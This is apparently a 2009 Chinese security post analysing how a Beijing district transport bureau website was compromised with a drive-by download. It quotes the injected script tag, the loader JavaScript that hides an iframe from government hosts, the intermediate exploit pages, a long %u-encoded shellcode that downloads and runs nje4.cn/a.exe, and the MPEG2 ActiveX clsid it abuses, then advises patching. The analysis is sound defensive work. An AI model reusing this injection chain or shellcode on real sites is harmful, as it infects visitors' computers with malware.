北京市平谷区交通局网站被挂马


2009年07月22日 星期三 11:23

2009-7-22 11:00

hxxp://jtj.bjpg.gov.cn

首页底部挂马:

<script src=http://%6D%62%72%33%2E%63%6E></script>

对 src 中的百分号编码做 unescape 解码，得到：mbr3.cn

mbr3.cn 返回的脚本内容如下：

// Loader script served from mbr3.cn. It only injects the hidden iframe when
// the current page URL does NOT contain "gov"; on the compromised site itself
// (jtj.bjpg.gov.cn) the href does contain "gov", so the empty branch runs and
// nothing is written. The reason for excluding government hosts is not stated
// on the page — presumably to avoid attracting the attention of those sites'
// own operators (inference).
if (document.location.href.indexOf("gov")>=0)
{} else {document.write("<div style='display:none'>");
// Invisible container: the drive-by iframe to nje4.cn/01.htm is wrapped in a
// display:none div, a pattern worth flagging when scanning page sources.
document.write("<iframe src=http://nje4.cn/01.htm></iframe>");
document.write("</div>");}


跟踪 http://nje4.cn/01.htm，内容如下：
<!-- nje4.cn/01.htm as captured: two zero-height iframes pull in the actual
     exploit pages — 123.htm (analysed below) and dex.html (not followed on
     this page). -->
<html>
<iframe src="123.htm" width=111 height=0 border=0></iframe>
<iframe src="dex.html" width=111 height=0 border=0></iframe>
<br>
<br>
<br>
<br>
<br>
<script type="text/javascript">
// Inline script: with roughly 50% probability (random 0..9999 > 5000) it
// writes a cnzz.com stat counter tag, apparently so the attacker can count
// victims (inference). The broken string literal across the following lines
// and the "<//script>" token are reproduced exactly as captured; they are
// likely artefacts of the original page or of copying, not intentional code.
var allok=Math.floor(Math.random()*10000);if((allok>5000))
document.writeln("<script src='http://s17.cnzz.com/stat.php?id=1528016&web_id=1528016'

language='JavaScript' charset='gb2312'><//script>");</script>


然后跟踪 http://nje4.cn/123.htm，内容如下：


<!-- nje4.cn/123.htm as captured: three resources named like images are
     loaded as <script>, so the .jpg extension is likely only a disguise to
     pass casual inspection or content filters. go.jpg holds the %u-encoded
     shellcode decoded below; go1.jpg carries the clsid-based exploit noted at
     the end of the article; gd.jpg is not analysed on this page.
     Note the <div id="DivID"> is never closed in the captured source. -->
<html>
<body>
<div id="DivID">
<script src='go.jpg'></script>
<script src='gd.jpg'></script>
<script src='go1.jpg'></script>
</body>
</html>

解码 go.jpg，得到如下 %u 编码的数据：

%uE890%u034D%u0000%u0068%u0020%u6A00%uFF00%uB9D0%u0800%u0000%uF88B%u05EB%uF35E%uFFA4%uE8D0%uFFF6%uFFFF%u54E8%u0003%u8B00%uE8F8%u0038%u0000%u64E8%u0001%uE800%u0046%u0000%uF2E8%u0003%u8B00%uE8F8%u0022%u0000%u5BE8%u0001%uE800%u0030%u0000%uA0E8%u0003%u8B00%uE8F8%u000C%u0000%u78E8%u0001%uE800%u001A%u0000%u58EB%u8B53%u53DC%u406A%u0068%u0010%u5700%uC8E8%u0002%uE800%u00FA%u0000%uC358%u8B53%u53DC%u206A%u0068%u0010%u5700%uB0E8%u0002%uE800%u00E2%u0000%uC358%uE857%u0453%u0000%uF88B%uC933%u3349%uB0C0%uFCC3%uAEF2%u478D%u5FFF%u5BC3%uC63E%uB807%u893E%u015F%u3E66%u47C7%uFF05%uC3E0%uACE9%u0004%u5B00%uEC81%u0114%u0000%uD48B%uC73E%u6302%u646D%u3E20%u42C7%u2F04%u2063%u3E22%u42C7%u6308%u646D%u3E20%u42C7%u2F0C%u2063%u8322%u10C2%uC033%u5050%u0468%u0001%u5200%u5053%uC8E8%u0003%uE800%u0072%u0000%uFC8B%uC78B%uC083%u3E08%u188A%uDB84%u0374%uEB40%u66F6%uC73E%u2200%u3322%u3ED2%u5088%u8302%u54EC%uC033%uDB33%uCC8B%uF883%u7D54%u3E09%u1C89%u8308%u04C0%uF2EB%uCC8B%uD98B%uC383%u3310%u3EC0%u43C7%u012C%u0000%u5100%u5053%u5050%u5050%u5750%uE850%u033B%u0000%u19E8%u0000%u6400%u04A1%u0000%u8D00%u60A0%uFFFF%uE8FF%u0339%u0000%uDB33%u5353%u5353%uD0FF%u3880%u74E9%u8005%uE838%u0F75%u7881%u9005%u4190%u7490%u5506%uEC8B%u408D%uFF05%uE8E0%uFF17%uFFFF%uE8C3%uFF11%uFFFF%u11B8%u0401%uC280%u000C%u04E8%uFFFF%u33FF%u50C0%uE854%u0054%u0000%uE850%u028B%u0000%uD0FF%u8036%u243C%u7700%uE80A%u0241%u0000%uFF33%uFF57%uE8D0%u01FB%u0000%uFF68%u0000%uFF00%uE8D0%uFED1%uFFFF%u5753%u3356%u50C0%uE854%u001E%u0000%uE850%u0255%u0000%uD0FF%u8036%u243C%u7700%uE80A%u020B%u0000%uFF33%uFF57%u58D0%u5F5E%uC35B%u02EB%uC358%uF9E8%uFFFF%u56FF%u8357%u08EC%uFC8B%u086A%u3E57%u77FF%uE814%u025D%u0000%uD0FF%uFC8B%u6168%u656D%u6800%u4549%u7246%uF48B%u08B9%u0000%uF300%u75A6%u6A2F%u3E00%u74FF%u2024%u24E8%u0002%uFF00%u8BD0%uE8F8%u01CB%u0000%uD0FF%uF83B%u0874%u8B36%u2444%u3E20%u00FF%uFF3E%u2474%uE81C%u01EF%u0000%uD0FF%uC483%u5F10%uB85E%u0001%u0000%u68C3%u6E6F%u0000%u7568%u6C72%uEB6D%u8D15%u2444%u5004%u0BE8%uFFFE%u50FF%u4AE8%u0002%uE900%uFEE0%uFFFF%uE6E8%uFFFF%u
83FF%u08C4%u6AC3%u686C%u746E%u6C64%u15EB%u448D%u0424%uE850%uFDE4%uFFFF%uE850%u0223%u0000%uB9E9%uFFFE%uE8FF%uFFE6%uFFFF%uC483%uC308%u3368%u0032%u6800%u7375%u7265%u15EB%u448D%u0424%uE850%uFDBA%uFFFF%uE850%u01F9%u0000%u8FE9%uFFFE%uE8FF%uFFE6%uFFFF%uC483%uC308%u6368%u7776%u6800%u6873%u6F64%u15EB%u448D%u0424%uE850%uFD90%uFFFF%uE850%u01CF%u0000%u65E9%uFFFE%uE8FF%uFFE6%uFFFF%uC483%uC308%u7668%u7867%uEB00%u8D15%u2444%u5004%u6BE8%uFFFD%u50FF%uAAE8%u0001%uE900%uFE40%uFFFF%uE6E8%uFFFF%u83FF%u04C4%uE8C3%u01AB%u0000%u1B68%u46C6%u5079%uC6E8%u0001%u8300%u08C4%uE8C3%u0197%u0000%uEC68%u0397%u500C%uB2E8%u0001%u8300%u08C4%uE8C3%u0183%u0000%uAA68%u0DFC%u507C%u9EE8%u0001%u8300%u08C4%uE8C3%u016F%u0000%uED68%uEF56%u5036%u8AE8%u0001%u8300%u08C4%uE8C3%u015B%u0000%uF068%u048A%u505F%u76E8%u0001%u8300%u08C4%uE8C3%uFEF7%uFFFF%u7868%uDB68%u501C%u62E8%u0001%u8300%u08C4%uE8C3%u0133%u0000%uEF68%uE0CE%u5060%u4EE8%u0001%u8300%u08C4%uE8C3%u011F%u0000%uB068%u2D49%u50DB%u3AE8%u0001%u8300%u08C4%uE8C3%uFF36%uFFFF%uAB68%u9B5E%u501E%u26E8%u0001%u8300%u08C4%uE8C3%uFEA7%uFFFF%u5968%u8197%u5002%u12E8%u0001%u8300%u08C4%uE8C3%u00E3%u0000%u7E68%uE2D8%u5073%uFEE8%u0000%u8300%u08C4%uE8C3%u00CF%u0000%u9E68%uBBF9%u5035%uEAE8%u0000%u8300%u08C4%uE8C3%uFE92%uFFFF%u5768%uB5A0%u50BB%uD6E8%u0000%u8300%u08C4%uE8C3%uFE7E%uFFFF%u1A68%u1E7A%u5002%uC2E8%u0000%u8300%u08C4%uE8C3%uFE6A%uFFFF%uE068%u305B%u5094%uAEE8%u0000%u8300%u08C4%uE8C3%uFE56%uFFFF%u9768%uE2C9%u50A3%u9AE8%u0000%u8300%u08C4%uE8C3%uFE42%uFFFF%u6868%uC524%u50B3%u86E8%u0000%u8300%u08C4%uE8C3%u0057%u0000%u7268%uB3FE%u5016%u72E8%u0000%u8300%u08C4%uE8C3%uFE44%uFFFF%u13EB%u656A%uE850%uFBE0%uFFFF%uE850%uFEAB%uFFFF%uB5E9%uFFFC%uE8FF%uFFE8%uFFFF%uE8C3%uFDA9%uFFFF%u4F68%u4FEF%u5005%u3EE8%u0000%u8300%u08C4%uE8C3%u000F%u0000%u8E68%u0E4E%u50EC%u2AE8%u0000%u8300%u08C4%u33C3%u64C0%u408B%u8530%u78C0%u3E10%u408B%u3E0C%u708B%uAD1C%u8B3E%u0840%uEBC3%u3E0B%u408B%u8334%u7CC0%u8B3E%u3C40%u60C3%u8B36%u246C%u3624%u458B%u363C%u548B%u7828%uD503%u8B3E%u184A%u8B3E%u205A%uDD03%u3BE3%u3E49%u34
8B%u038B%u33F5%u33FF%uFCC0%u84AC%u74C0%uC107%u0DCF%uF803%uF4EB%u3B36%u247C%u7528%u3EDF%u5A8B%u0324%u66DD%u8B3E%u4B0C%u8B3E%u1C5A%uDD03%u8B3E%u8B04%uC503%u8936%u2444%u611C%uE8C3%uFB4F%uFFFF%u7468%u7074%u2f3a%u6e2f%u656a%u2e34%u6e63%u612f%u652e%u6578%u0000

用 Freshow 打开，按 ESC 解码一次，得到：

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

再按一次 ESC，得到：

愯M h j 孁?^螭 鑄 孁?鑔 鐵栩 孁?鑋 ?锠 孁?鑨 ?隭S嬡Sj@h W枞 楮X肧嬡Sj h W璋 桠X肳鑃 孁3蒊3腊命虍岹 肹>??塤 f>荊 瞄 [侅 嬙>?cmd >荁 /c ">荁 cmd >荁 /c "兟 3繮Ph RSP枞 鑢孅嬊兝 >?勠t @膂f>?"3?圥 冹T3?蹕虄鳷} >? 兝 腧嬏嬞兠 3?荂, QSPPPPPPWP? ?d?崰` 3跾SSS 8閠 8鑥 亁 悙A恡 U嬱岪 ?? 繮T鑄P鑻 <$w
鐰 3 h 需瑶 SWV3繮T?P鑅 <$w
? 3 X^_[秒 X描? VW冹 孅j W> 鑍 孅hamehIEFr嬼?螃u/j> $ ? 孁 鴗 6婦$ > gt; $ 栾 _^?胔onhurlm?岲$ P?? 鐹 猷? 兡 胘lhntdl?岲$ P桎? ? 楣? 兡 胔32huser?岲$ P韬? 棂 閺? 兡 胔cvwhshdo?岲$ P钀? 柘 閑? 兡 胔vgx?岲$ P鑛? 瑾 锧? 兡 描?h 艶yP杵 兡 描?h鞐 P璨 兡 描?h
|P铻 兡 描o h鞻?P鑺 兡 描[ h饖 _P鑦 兡 描齄 hxh?P鑒 兡 描3 h镂郹P鐽 兡 描 h癐-跴? 兡 描6 玘?P? 兡 描 hY梺 P? 兡 描鉮~剽sP棹兡 描蟞烓?P桕兡 描揀 hW牭籔柚兡 描~? z P杪兡 描j? 郲0擯璁兡 描V? 椛猓P铓兡 描B? h$懦P鑶兡 描Whr P鑢兡 描D? jeP栲? 璜? 描 hO颫 P?兡 描 h嶯 霵?兡 ?纃婡0吚x >婡 >媝 ?婡 秒 >婡4兝|>婡<胉6媗$$6婨<6婽(x ?婮 >媄 葶;I>??? 傈瑒纓 料
?;|$(u?媄$ 輋>?K>媄 ????塂$ a描O? a href="http://nje4.cn/a.exe">http://nje4.cn/a.exe

最后跳转到 http://nje4.cn/a.exe（该地址以明文出现在上面解码结果的末尾）。

分析 go1.jpg，其使用的 clsid 为 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF，

对应微软 MPEG2 漏洞。微软官方已经发布了该漏洞的补丁。

使用 360 安全卫士或其他工具安装补丁、修复系统漏洞即可。

